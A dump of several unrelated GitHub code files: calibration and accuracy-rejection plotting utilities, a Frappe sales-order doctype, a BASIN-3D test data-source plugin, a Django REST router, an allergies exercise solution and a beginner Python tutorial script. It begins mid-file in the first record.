\", bin_counts)\n avg_acc = np.sum(bin_accuracies * bin_counts) / np.sum(bin_counts)\n avg_conf = np.sum(bin_confidences * bin_counts) / np.sum(bin_counts)\n\n gaps = np.abs(bin_accuracies - bin_confidences)\n ece = np.sum(gaps * bin_counts) / np.sum(bin_counts)\n\n plt.style.use('seaborn-v0_8')\n plt.plot(bin_confidences, bin_accuracies, label='Learning Confidence', color = 'tab:blue', linestyle=\"-\")\n plt.plot([0.0, 1.0], [0.0, 1.0], label='Ideal', color = 'tab:gray', linestyle=\"--\")\n plt.xlabel('Confidence')\n plt.ylabel('Accuracy')\n plt.legend(loc=0)\n\n cal_path = \"CAL_curves/\"+data+\"_\"+model\n if not os.path.exists(cal_path):\n os.makedirs(cal_path)\n\n titlename = 'Calibration Learning Confidence - '+data+' - ECE: '+str(round(ece, 2))\\\n +' - Avg-Acc: '+str(round(avg_acc, 2))+' - Avg-Conf: '+str(round(avg_conf, 2))\n filename = cal_path+'/LC_cal_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n plt.title(titlename)\n plt.savefig(filename)\n plt.clf()\n return bin_confidences, bin_accuracies, ece\n\ndef calc_rejection_curve(all_labels, predictions, id_array, ood_array, device, all_images, all_ood_images):\n print(\"Calculating ACR curve metrics...\")\n accuracies = np.ones(11)\n ideal = np.ones(11)\n fractions = np.linspace(0.0, 1.0, 11)\n\n predictions = torch.from_numpy(predictions).to(device)\n id_array = torch.from_numpy(id_array).squeeze().to(device)\n ood_array = torch.from_numpy(ood_array).squeeze().to(device)\n\n # combine arrays conveniently\n corrects = predictions.eq(all_labels)\n oods = torch.zeros(len(ood_array), device=device)\n corrects = torch.cat((corrects, oods), dim=0) # combined correctess indicators with all ood samples set to false (0)\n uncertainties = torch.cat((id_array, ood_array), dim=0) # combined uncertainty (confidence) array\n images = torch.cat((all_images, all_ood_images), dim=0) # combined id/ood-images tensor\n all_ood_labels = torch.full((1, all_ood_images.size(0)), fill_value=-1)\n all_ood_labels = all_ood_labels.squeeze().to(device)\n labels = torch.cat((all_labels, all_ood_labels))\n\n accuracies[0] = corrects.sum() / corrects.size(0)\n num_discard = int(0.1*uncertainties.size(0))\n\n # sort array according to entropy\n sorted_unc, indices = torch.sort(uncertainties, dim=0, descending=True)\n sorted_cor = corrects.clone().scatter_(0, indices, corrects)\n filtered_imgs = images[indices[:]] # insert [:10] here to only take fraction (10 most uncertain)\n filtered_uncs = uncertainties[indices[:]] # the corresponding uncertainty values (10 highest with [:10])\n filtered_lbls = labels[indices[:]]\n\n # calculate values for theoretical maximum\n ideal[0] = id_array.size(0) / (ood_array.size(0) + id_array.size(0))\n\n # iteratively throw out predictions 10% of the most uncertain data + recalculate accuracy\n for i in range(1, 11):\n sorted_cor = sorted_cor[num_discard:]\n oods_left = ood_array.size(0)-num_discard*i\n if oods_left >= 0:\n # ideal: only ood's discarded, all ID's retained with high certainty \n # -> ideal = fraction of id samples\n ideal[i] = id_array.size(0) / (oods_left + id_array.size(0))\n if sorted_cor.size(0) > 0:\n accuracies[i] = sorted_cor.sum() / sorted_cor.size(0)\n return fractions, accuracies, ideal, filtered_imgs, filtered_uncs, filtered_lbls\n\ndef plot_accrej_curve(fractions, accuracies, ideal, model, data, seed, id):\n # plot and save accuracy-rejection curve\n plt.style.use('seaborn-v0_8')\n plt.plot(fractions, accuracies, label='Learning Confidence', color = 'tab:orange', linestyle=\"-\")\n plt.plot(fractions, ideal, label='Theoretical Maximum', color = 'tab:gray', linestyle=\"-\")\n plt.xlabel('% of data rejected by uncertainty') #, fontsize=20\n plt.xticks() #fontsize=20\n plt.ylabel('Accuracy') #, fontsize=20\n plt.legend(loc=0)\n plt.yticks() #fontsize=20\n accrej_path = \"ACCREJ_curves/\"+data+\"_\"+model\n if not os.path.exists(accrej_path):\n os.makedirs(accrej_path)\n\n titlename = 'Acc-Rej-curve Learning Confidence - ' + data\n filename = accrej_path+'/LC_accrej_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n plt.title(titlename) #, fontsize=25\n plt.savefig(filename)\n plt.clf()\n\n#---------------------------------------------------------------------------\n\ndef encode_onehot(labels, n_classes, device):\n onehot = torch.FloatTensor(labels.size()[0], n_classes)\n labels = labels.data\n if labels.is_cuda:\n onehot = onehot.to(device)\n onehot.zero_()\n onehot.scatter_(1, labels.view(-1, 1), 1)\n return onehot\n\nclass CSVLogger():\n def __init__(self, args, filename='log.csv', fieldnames=['epoch']):\n\n self.filename = filename\n self.csv_file = open(filename, 'w')\n\n # Write model configuration at top of csv\n writer = csv.writer(self.csv_file)\n for arg in vars(args):\n writer.writerow([arg, getattr(args, arg)])\n writer.writerow([''])\n\n self.writer = csv.DictWriter(self.csv_file, fieldnames=fieldnames)\n self.writer.writeheader()\n\n self.csv_file.flush()\n\n def writerow(self, row):\n self.writer.writerow(row)\n self.csv_file.flush()\n\n def close(self):\n self.csv_file.close()\n","repo_name":"theresabruns/UncertaintyEstimation","sub_path":"LearningConfidence/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7127393498","text":"import frappe\nfrom frappe.model.document import Document\n\n\nclass CustomerPO(Document):\n\n\t@frappe.whitelist()\n\tdef create_sales_order(self):\n\t\tso_doc = frappe.new_doc(\"Sales Order\")\n\t\tso_doc.customer = self.customer\n\t\tso_doc.transaction_date = self.date\n\t\tso_doc.delivery_date = self.delivery_date\n\t\tfor item in self.items:\n\t\t\tso_doc.append(\"items\", {\n\t\t\t\t\"item_code\": item.item_code,\n\t\t\t\t\"item_name\": frappe.db.get_value(\"Item\", item.item_code, \"item_name\"),\n\t\t\t\t\"description\": item.description,\n\t\t\t\t\"qty\": item.qty,\n\t\t\t\t\"uom\": item.uom,\n\t\t\t\t\"rate\": item.rate,\n\t\t\t\t\"amount\": item.amount\n\t\t\t})\n\t\t\t\n\t\tso_doc.save()\n\t\tso_doc.against_customer_po = self.name\n\t\tso_doc.submit()\n\n\t\tsales_order = frappe.db.set_value(self.doctype, self.name, \"sales_order\", so_doc.name)\n\n\t\treturn {\"doc_name\":so_doc.name}","repo_name":"Lewinta/hampden","sub_path":"hampden/hampden/doctype/customer_po/customer_po.py","file_name":"customer_po.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27030994075","text":"import logging\nfrom typing import Any, List\n\nfrom basin3d.core.models import AbsoluteCoordinate, AltitudeCoordinate, Coordinate, DepthCoordinate, \\\n GeographicCoordinate, MeasurementTimeseriesTVPObservation, MonitoringFeature, RelatedSamplingFeature, \\\n RepresentativeCoordinate, SpatialSamplingShapes, VerticalCoordinate, ResultListTVP\nfrom basin3d.core.plugin import DataSourcePluginPoint, basin3d_plugin, DataSourcePluginAccess\nfrom basin3d.core.schema.enum import FeatureTypeEnum, TimeFrequencyEnum\nfrom basin3d.core.schema.query import QueryMonitoringFeature, QueryMeasurementTimeseriesTVP\n\nlogger = logging.getLogger(__name__)\n\n\nclass AlphaMeasurementTimeseriesTVPObservationAccess(DataSourcePluginAccess):\n \"\"\"\n MeasurementTimeseriesTVPObservation Access class\n \"\"\"\n synthesis_model_class = MeasurementTimeseriesTVPObservation\n\n def list(self, query: QueryMeasurementTimeseriesTVP):\n \"\"\"\n Generate a list of MeasurementTimeseriesTVPObservation objects\n \"\"\"\n synthesis_messages: List[str] = []\n data: List[Any] = []\n quality: List[Any] = []\n\n # query = kwargs.get('query')\n # assert query\n\n if query.monitoring_feature == ['region']:\n return StopIteration({\"message\": \"FOO\"})\n\n supported_monitoring_features = [f'{num}' for num in range(1, 5)]\n\n if not any([loc_id in supported_monitoring_features for loc_id in query.monitoring_feature]):\n return StopIteration({\"message\": \"No data from data source matches monitoring features specified.\"})\n\n location_indices = []\n for loc_id in query.monitoring_feature:\n if loc_id in supported_monitoring_features:\n location_indices.append(int(loc_id.split('-')[-1]))\n\n from datetime import datetime\n for num in range(1, 10):\n data.append((datetime(2016, 2, num), num * 0.3454))\n data = [data, data, [], data]\n rqe1 = 'VALIDATED'\n rqe2 = 'UNVALIDATED'\n rqe3 = 'REJECTED'\n quality = [[rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1],\n [rqe2, rqe2, rqe2, rqe2, rqe2, rqe2, rqe2, rqe3, rqe3],\n [],\n [rqe1, rqe2, rqe3, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1]]\n qualities = [[rqe1],\n [rqe2, rqe3],\n [],\n [rqe1, rqe2, rqe3]]\n observed_property_variables = [\"Acetate\", \"Acetate\", \"Aluminum\", \"Al\"]\n units = ['nm', 'nm', 'mg/L', 'mg/L']\n statistics = ['mean', 'max', 'mean', 'max']\n\n for num in location_indices:\n observed_property_variable = observed_property_variables[num - 1]\n feature_id = f'A-{str(num - 1)}'\n if query:\n if observed_property_variable not in query.observed_property:\n continue\n if query.statistic:\n if statistics[num - 1] not in query.statistic:\n continue\n result_value = data[num - 1]\n result_value_quality = quality[num - 1]\n result_qualities = qualities[num - 1]\n if query.result_quality:\n filtered_value = []\n filtered_quality = []\n has_filtered_data_points = 0\n\n for v, q in zip(result_value, result_value_quality):\n if q in query.result_quality:\n filtered_value.append(v)\n filtered_quality.append(q)\n else:\n has_filtered_data_points += 1\n\n if has_filtered_data_points > 0:\n synthesis_messages.append(f'{feature_id} - {observed_property_variable}: {str(has_filtered_data_points)} timestamps did not match data quality query.')\n\n if len(filtered_value) == 0:\n synthesis_messages.append(f'{feature_id} - {observed_property_variable}: No data values matched result_quality query.')\n print(f'{feature_id} - {observed_property_variable}')\n continue\n\n result_value = filtered_value\n result_value_quality = filtered_quality\n if len(result_value_quality) > 0:\n result_qualities = list(set(result_value_quality))\n else:\n result_qualities = []\n\n yield MeasurementTimeseriesTVPObservation(\n plugin_access=self,\n id=num,\n observed_property=observed_property_variable,\n utc_offset=-8 - num,\n feature_of_interest=MonitoringFeature(\n plugin_access=self,\n id=num,\n name=\"Point Location \" + str(num),\n description=\"The point.\",\n feature_type=FeatureTypeEnum.POINT,\n shape=SpatialSamplingShapes.SHAPE_POINT,\n coordinates=Coordinate(\n absolute=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative=RepresentativeCoordinate(\n vertical_position=DepthCoordinate(\n datum=DepthCoordinate.DATUM_LOCAL_SURFACE,\n value=-0.5 - num * 0.1,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)\n )\n ),\n observed_properties=[\"Ag\", \"Acetate\", \"Aluminum\", \"Al\"],\n related_sampling_feature_complex=[\n RelatedSamplingFeature(\n plugin_access=self,\n related_sampling_feature=\"Region1\",\n related_sampling_feature_type=FeatureTypeEnum.REGION,\n role=RelatedSamplingFeature.ROLE_PARENT)]\n ),\n feature_of_interest_type=FeatureTypeEnum.POINT,\n unit_of_measurement=units[num - 1],\n aggregation_duration=TimeFrequencyEnum.DAY,\n result_quality=result_qualities,\n time_reference_position=None,\n statistic=statistics[num - 1],\n result=ResultListTVP(\n plugin_access=self,\n value=result_value, result_quality=result_value_quality)\n )\n\n return StopIteration(synthesis_messages)\n\n\nclass AlphaMonitoringFeatureAccess(DataSourcePluginAccess):\n \"\"\"\n MonitoringFeature access class\n \"\"\"\n synthesis_model_class = MonitoringFeature\n\n def list(self, query: QueryMonitoringFeature):\n \"\"\"\n Generate list of MonitoringFeature objects\n \"\"\"\n\n feature_type = query.feature_type\n monitoring_feature_list = query.monitoring_feature\n\n obj_region = MonitoringFeature(\n plugin_access=self,\n id=\"Region1\",\n name=\"AwesomeRegion\",\n description=\"This region is really awesome.\",\n feature_type=FeatureTypeEnum.REGION,\n shape=SpatialSamplingShapes.SHAPE_SURFACE,\n coordinates=Coordinate(representative=RepresentativeCoordinate(\n representative_point=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)\n )\n )\n\n if monitoring_feature_list and 'Region1' in monitoring_feature_list:\n if feature_type == FeatureTypeEnum.REGION:\n yield obj_region\n elif feature_type == FeatureTypeEnum.REGION:\n yield obj_region\n\n obj_point = MonitoringFeature(\n plugin_access=self,\n id=\"1\",\n name=\"Point Location 1\",\n description=\"The first point.\",\n feature_type=FeatureTypeEnum.POINT,\n shape=SpatialSamplingShapes.SHAPE_POINT,\n coordinates=Coordinate(\n absolute=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative=RepresentativeCoordinate(\n vertical_position=DepthCoordinate(\n datum=DepthCoordinate.DATUM_LOCAL_SURFACE,\n value=-0.5,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)\n )\n ),\n observed_properties=[\"Ag\", \"Acetate\"],\n related_sampling_feature_complex=[\n RelatedSamplingFeature(\n plugin_access=self,\n related_sampling_feature=\"Region1\",\n related_sampling_feature_type=FeatureTypeEnum.REGION,\n role=RelatedSamplingFeature.ROLE_PARENT)]\n )\n\n if monitoring_feature_list and '1' in monitoring_feature_list:\n if feature_type == FeatureTypeEnum.POINT:\n yield obj_point\n elif feature_type == FeatureTypeEnum.POINT:\n yield obj_point\n\n def get(self, query: QueryMonitoringFeature):\n\n \"\"\"\n Get a Monitoring Feature objects\n \"\"\"\n # query.id will always be a string at this point with validation upstream, thus ignoring the type checking\n prefixed_monitoring_feature = f'{self.datasource.id_prefix}-{query.id}' # type: ignore[list-item]\n\n query.monitoring_feature = [query.id] # type: ignore[list-item]\n\n for s in self.list(query):\n if s.id == prefixed_monitoring_feature:\n return s\n return None\n\n\n@basin3d_plugin\nclass AlphaDataSourcePlugin(DataSourcePluginPoint):\n title = 'Alpha Data Source Plugin'\n plugin_access_classes = (AlphaMeasurementTimeseriesTVPObservationAccess, AlphaMonitoringFeatureAccess)\n\n feature_types = ['REGION', 'POINT', 'TREE', 'HORIZONTAL_PATH']\n\n class DataSourceMeta:\n \"\"\"\n This is an internal metadata class for defining DataSource attributes.\n \"\"\"\n # Data Source attributes\n location = 'https://asource.foo/'\n id = 'Alpha' # unique id for the datasource\n id_prefix = 'A'\n name = id # Human Friendly Data Source Name\n","repo_name":"BASIN-3D/django-basin3d","sub_path":"example-django/mybroker/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":11574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28176452436","text":"# -*- coding: utf-8 -*-\n\nfrom rest_framework import routers\nfrom tutor.api.views import EngageViewSet, GradeViewSet, ChoiceTeacherViewSet\n\nrouter = routers.SimpleRouter()\n\nrouter.register(r'engage', EngageViewSet, base_name='engage')\nrouter.register(r'grade', GradeViewSet, base_name='grade')\nrouter.register(r'choiceteacher', ChoiceTeacherViewSet, base_name='choiceteacher')\n\nurlpatterns = router.urls\n","repo_name":"15810111831/xieyiyuan","sub_path":"education/tutor/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40686835439","text":"__author__ = 'banarasitippa'\n\ndef toStr(n,base):\n convertString = \"0123456789ABCDEF\"\n if n < base:\n return convertString[n]\n else:\n return toStr(n//base,base) + convertString[n%base]\n\n\nclass Allergies:\n\n def __init__(self,alergy_count):\n self.alergy_count = alergy_count\n self.list = self.findAlergies()\n\n def findAlergies(self):\n alergies = ('eggs peanuts shellfish strawberries tomatoes '\n 'chocolate pollen cats').split()\n base_2_num = toStr(self.alergy_count,2)\n ls =[]\n p = 0\n for x in base_2_num[::-1]:\n if x ==\"1\" and p < 8:\n ls.append(alergies[p])\n p += 1\n# print ls\n return ls\n\n def is_allergic_to(self,item):\n return item in self.list\n\n#print Allergies(5)\n#print (toStr(1,2))\n#allergies = Allergies(3)\n#print (allergies.is_allergic_to('eggs'))\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/allergies/1ecc7a34ec69441a9ae41383da23c691.py","file_name":"1ecc7a34ec69441a9ae41383da23c691.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"40206525175","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport constant\n\ndef example_001():\n\ta = 1 + 2 + 3 + \\\n\t\t4 + 5 + 6 + \\\n\t\t7 + 8 + 9\n\treturn a\n\ndef example_002():\n\ta = (1* 2 * 3 *\n\t\t4 * 5 * 6 *\n\t\t7 * 8 * 9\n\t\t)\n\treturn a\n\ndef example_003():\n\ta, b, c = 1, 2, 3\n\tx = 1; y = 2; z = 3;\n\treturn a + b + c + x * y * z\n\ndef example_004():\n\tcolors = [\n\t\t'red', 'green', 'blue',\n\t\t'gray', 'orange', 'pink'\n\t]\n\treturn colors\n\ndef example_005():\n\tfor i in range(1,10):\n\t\tprint(i)\n\t\tif i == 5:\n\t\t\tbreak\n\ndef example_006():\n\tprint(constant.PI)\n\tprint(constant.GRAVITY)\n\ndef example_007():\n\ta = 0b01\n\tb = 100\n\tc = 0o10\n\td = 0x0A #Hexadecimal Literal\n\t# FLOAT Literals\n\tf_001 = 10.5\n\tf_002 = 1.5e2\n\tf_003 = 1.5 * 100\n\t# COMPLEX\n\t#Complex Literal \n\tx = 1+3.14j\n\tprint(a,b,c,d,f_001,f_002,f_003,x,x.real, x.imag)\n\t# String literals\n\ta_str = \"simple string\\n\"\n\tchar = \"C\\n\"\n\tlines = \"\"\"\n\tLine 1 \\n\n\tLine 2 \\n\n\tLine 3 \\n\n\t\"\"\"\n\tunicode = u\"\\u00dcnic\\u00f6de\"\n\traw_str = r\"raw \\n string\"\t\n\tprint(a_str,char, lines, unicode, raw_str)\n\t# Boolean literals: True | False\n\tprint(\"1 == True\", 1 == True)\n\tprint(\"0 == True\", 0 == True)\n\tprint(\"'' == True\", \"\" == True)\n\tprint(\"0.0 == True\", 0.0 == True)\n\tcount = 10\n\tis_valid_answer = False\n\tcount += is_valid_answer\n\tprint(count)\n\t# Special literals: None\n\tdrink = \"Coffee\"\n\tfood = None\n\tdef menu(x):\n\t\tif x == drink:\n\t\t\tprint(drink)\n\t\telse:\n\t\t\tprint(food)\n\tmenu(drink)\n\tmenu(food)\n\t# literals collections\n\tfruits = ['apple','mango','orange', 1, 2.0] # list\n\tnumbers = ('a', 2, 3.0) # tuple : freeze\n\tuser = {'first_name': 'Python', 'last_name': 'Fundamentals', 'description': 'Tutorial'} # dictionary\n\tvowels = {'a', 'e', 'i' , 'o', 'u'} #set : freeze\n\tfruits[0] = 'mango'\n\tprint(fruits)\n\tprint(numbers)\n\tk = 'description'\t\n\tuser[k] += ' Headfirst'\n\tprint(user, user['first_name'], user['last_name'], user[k])\t\n\tprint(vowels)\n\t# numbers\n\ta = 5\n\tprint(a, \"is of type\", type(a))\n\n\ta = 2.0\n\tprint(a, \"is of type\", type(a))\n\n\ta = 1+2j\n\tprint(a, \"is complex number?\", isinstance(1+2j,complex))\n\n\ta = 123456789123456789123456789123456789123456789123456789 # memory limit\n\tb = 0.123456789123456789123456789123456789123456789123456789 # 15\n\tprint(a,b)\n\n\t# list\n\ta = [5,10,15,20,25,30,35,40]\n\tprint(a[0], a[5])\n\tprint(a[0:3])\n\tprint(a[4:])\n\tprint(a[:3])\n\tprint(a[:-2])\t\n\t# tuple\n\tb = (5, '2021', 'Jan', True)\n\tprint(b[0], b[0:2], a[0:-1])\n\t# string\n\tstr = \"pythondevelopers\"\n\tprint(str[0:5], str[:-1])\n\t# set\n\tuniqueValues = {1,1,1,2,3,4,5} # unorder list\n\tprint(uniqueValues)\n\t# dict\n\tobj = { 1: 'asda', 'name': 'something', 'value': 1.5e3, 'isValid': False}\n\tfor k in obj:\n\t\tprint(\"{} = {}\".format(k, obj[k]))\n\tprint(obj)\n\t# conversion\n\tn = \"25\"\n\tm = \"1\"\n\ttotal = int(n) + int(m)\n\tprint(total)\n\t# collections: list, tuple, set, dict\n\ta = tuple([1,2,3,1,2,3])\n\tprint(type(a), list(a), type([1,2,3]), set(a),list(set(a)))\n\tprint(dict([['first_name', 'Python'],['last_name','Tutorial']]))\n\t# output format\n\tx = 5; y = 10;\n\tprint('{} + {} = {}'.format(x, y, x + y))\n\ta = 'Python'; b = 'Tutorial';\n\tprint('{1} {0}'.format(b,a))\n\tfirst_name = 'Python'; last_name = 'Tutorial'\n\tprint('{first_name} {last_name}'.format(first_name=first_name, last_name=last_name))\n\tx = 123456.23456\n\tprint('x = %3.2f' %x)\n\timport math\n\tprint(math.pi)\n\timport sys\n\tprint(sys.path)\n\t# modulus, floor\n\tx = 5;\n\tfrom fractions import Fraction\n\tprint('{} % 2 = {}\\n {} // 2 = {}\\n {}^{} = {}\\n {}/{}={}'.format(x, x%2, x, x//2, 2,3, 2**3, 2,3,2/3))\n\tprint(Fraction(float(1/3)))\n\t# logical: and, or not\n\tif not False:\n\t\tprint('False')\n\telse:\n\t\tprint('True')\n\tfor x in range(1,100):\n\t\tif isPrime(x): print('{} '.format(x))\n\t# same memory check\n\tt = 5;\n\tz = t;\n\tv = 5;\n\tprint('Is {} and {} on the same memory? {}'.format(t,z, t is z))\n\tprint('Is {} and {} not on the same memory? {}'.format(t,v, t is not v))\n\tstr_a = \"hello\"\n\tstr_b = \"hello\"\n\tlist_a = [1,2,3]\n\tlist_b = [1,2,3]\n\tprint(str_a is str_b)\n\tprint(list_a is list_b)\n\tprint(tuple(list_a) is tuple(list_b))\n\t# Membership operators\n\tprint(\"{} is in {} ? {}\", 'e', str_a, 'e' in str_a)\n\tprint(\"{} is in {} ? {}\", '1', str_a, '1' not in str_a)\n\tprint(\"{} is in {} ? {}\", 1, list_a, 1 in list_a)\n\tprint(id(str_a), id(str_b), id(list_a), id(list_b), id(t), id(z), id(v))\n\tdef printHello():\n\t print(\"Hello\")\n\n\ta = printHello\n\ta()\n\t# Built-in namespace > Module: Global namespace > Function: Local namespace\n\ndef example_008():\n\t'''In this program, \n\twe check if the number is positive or\n\tnegative or zero and \n\tdisplay an appropriate message'''\n\n\tnum = 3.4\n\n\t# Try these two variations as well:\n\t# num = 0\n\t# num = -4.5\n\n\tif num > 0:\n\t print(\"Positive number\")\n\telif num == 0:\n\t print(\"Zero\")\n\telse:\n\t print(\"Negative number\")\n\n\tarr = [3, 5, 4, 1, 1, 1, 4, 5, 2, 2, 3]\n\tfor x in arr:\n\t\tprint(x)\n\ndef example_009():\n\tnumbers = range(1,11)\n\tsum = 0\n\tarea = 1\n\ta_str = \"\"\n\tb_str = \"\"\n\tfor i in range(len(numbers)):\n\t\tsum += numbers[i]\t\t\t\n\t\ta_str += str(numbers[i]) + (\" = \" if i == len(numbers) - 1 else \" + \")\n\tfor i in range(len(numbers)):\n\t\tarea *= numbers[i]\n\t\tb_str += str(numbers[i]) + ((\" * \",\" = \")[ i == len(numbers) - 1])\n\tprint(\"{}{}\".format(a_str, sum))\n\tprint(\"{}{}\".format(b_str, area))\n\t# program to display student's marks from record\n\tstudent_name = 'Soyuj'\n\n\tmarks = {'James': 90, 'Jules': 55, 'Arthur': 77} # dictionary\n\n\tfor student in marks:\n\t if student == student_name:\n\t print(marks[student])\n\t break\n\telse:\n\t print('No entry with that name found.')\t\n\n\tdigits = [0, 1, 5]\n\n\tfor i in digits:\n\t print(i)\n\telse:\n\t print(\"No items left.\")\n\n\tn = 10\n\n\t# initialize sum and counter\n\tsum = 0\n\ti = 1\n\n\twhile i <= n:\n\t sum = sum + i\n\t i = i+1 # update counter\n\n\t# print the sum\n\tprint(\"The sum is\", sum)\t \n\n\tfor val in \"string\":\n\t if val == \"i\":\n\t break\n\t print(val)\n\n\tprint(\"The end\")\n\n\tsequence = {'p', 'a', 's', 's'}\n\tfor val in sequence:\n\t pass\t\n\ndef example_010():\n\tdef greet(first_name, last_name, others=\"\"):\n\t\tprint(\"Hello {first_name} {last_name} {others}\".format(first_name=first_name, last_name=last_name, others=others))\n\tgreet(\"Python3\", \"Tutorial\")\n\tgreet(last_name = \"The tutorial\", first_name = \"Python3\")\n\tgreet(\"Python3\", others=\"test\", last_name = \"The tutorial\")\n\thello(\"PHP7\", \"Python3\", \"Golang\", \"Javascript\", \"Ruby\")\n\tnum = 10\n\tprint(\"{}! = {}\".format(num,factorial(num)))\n\t# lambda/ anonymous function\n\tdouble = lambda x: x * 2\n\tprint(\"double({}) = {}\".format(num, double(num)))\n\t# filter\n\tmy_list = [1, 5, 4, 6, 8, 11, 3, 12]\n\tnew_list = list(filter(lambda x: (x%2==0), my_list))\n\tprint(new_list)\n\t# map\n\tnew_l = list(map(lambda x: x*2, my_list))\n\tprint(new_l)\n\t# module\n\timport config;\n\timport loader;\n\tfrom math import pi, e\n\n\tprint(\"BASE_URL={}\\nENV={}\".format(config.BASE_URL, config.ENV))\n\tprint(pi, e)\n \ndef example_011():\n\t\"\"\"\n\tFile I/O:\n\t- Open a file\n\t- Read or write\n\t- Close the file\n\tNumbers:\n\t- Random number\n\t\"\"\"\t\n\timport re\n\ttry:\n\t\tdef splitLine(line):\n\t\t\ts = re.search(\"(This is line )(\\d*)\", line)\n\t\t\t\"\"\"\n\t\t\ts[0]:full\n\t\t\ts[1]:group1\n\t\t\ts[2]:group2\n\t\t\t\"\"\"\n\t\t\tif s:\n\t\t\t\treturn int(s[2])\n\t\t\treturn 0\n\t\t# mode: r : read, w: write, a:append, b:binary, t:text\n\t\t# open\n\t\tfile = './tmp/test.txt'\n\t\twith open(file, 'r+t') as f:\n\t\t\t# sum\n\t\t\tsum = 0\n\t\t\tlines = f.readlines()\t\t\n\t\t\tfor line in lines:\n\t\t\t\tsum += int(splitLine(line))\t\t\t\t\n\t\tf = open(file, 'a+t')\n\t\tf.write(\"SUM {}\\n\".format(sum))\n\t\tfor x in range(0,10):\n\t\t\tf.write(\"This is line {}\\n\".format(x + 1))\n\t\t# close\n\t\tf.close()\n\texcept Exception as e:\t\t\n\t\traise\n\tfinally:\n\t\tpass\n\ndef example_012():\n\timport random\n\tprint(random.randrange(10,20))\n\tx = ['red','green','blue','yellow','gray']\n\tprint(random.choice(x))\n\t# shuffle\n\trandom.shuffle(x)\n\tprint(x)\n\t# list\n\tnumbers = [1,2,3,4,5,6,7,8,9,10]\n\tprint(numbers[0:4], numbers[:-6])\n\tnumbers.append(11)\n\tprint(numbers[-1:])\n\tnumbers.extend([12,13,14,15])\n\tprint(numbers)\n\tdel_index = random.choice(range(0,len(numbers)))\n\tprint('del_index[{}] = {}'.format(del_index, numbers[del_index]))\n\tdel numbers[del_index]\n\tprint(numbers)\n\twhile numbers:\n\t\tnumbers.pop()\n\t\tprint(numbers[-1:])\n\ndef example_013():\n\tarr = [3, 5, 4, 1, 1, 4, 5, 2, 2, 3]\n\t# remove duplicate\t\n\tdef remove_duplicate_values(arr):\n\t\tnew_arr = []\n\t\tfor i in range(0,len(arr)):\t\t\t\n\t\t\tprint(\"{} - {}\".format(new_arr, arr[i:]))\n\t\t\tif len(new_arr) and new_arr[-1] == arr[i]:\n\t\t\t\tnew_arr.pop()\n\t\t\telse:\n\t\t\t\tnew_arr.append(arr[i])\n\t\treturn new_arr\n\tprint(remove_duplicate_values(arr))\n\n\t# animals list\n\tanimals = ['cat', 'dog', 'rabbit', 'guinea pig']\n\n\t# 'rabbit' is removed\n\tanimals.remove('rabbit')\n\n\t# Updated animals List\n\tprint('Updated animals list: ', animals)\n\ttry:\n\t\tif(animals.index('rabbit')):\n\t\t\tanimals.remove('rabbit')\t\t\t\t\n\t\tprint(animals)\n\texcept Exception as e:\n\t\tprint(e)\n\n\ts = ['I', 'want', 4, 'apples', 'and', 18, 'bananas'] \n\tstr1 = \"\"\n\tprint(str1.join([str(elem) for elem in s]))\n\ts = ' '.join(map(str, s))\n\tnumbers = [1,2,3,4]\n\n\tprint(s)\n\ndef hello(*names):\n\tfor name in names:\n\t\tprint(\"Hello\", name)\n\n\ndef factorial(x):\n\tif x == 1:\n\t\treturn x\n\treturn x * factorial(x - 1)\n\ndef isPrime(n):\n\tif n == 1 or n == 2: return True\n\tfor i in range(2,n-1):\n\t\tif( n % i == 0): return False\n\treturn True\n\ndef multiply(a, b):\n return a * b\n\ndef double(num):\n \"\"\"Function to double the value\"\"\"\n return 2*num \n\ndef print_hi(name):\n \"\"\"Function to say hello with name input\"\"\"\n print(f'Hi, {name}') \n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n print(multiply(1, 2))\n print(example_001())\n print(example_002())\n print(example_003())\n print(example_004())\n example_005()\n print(double.__doc__)\n print(print_hi.__doc__)\n example_006()\n example_007()\n example_008()\n example_009()\n example_010()\n 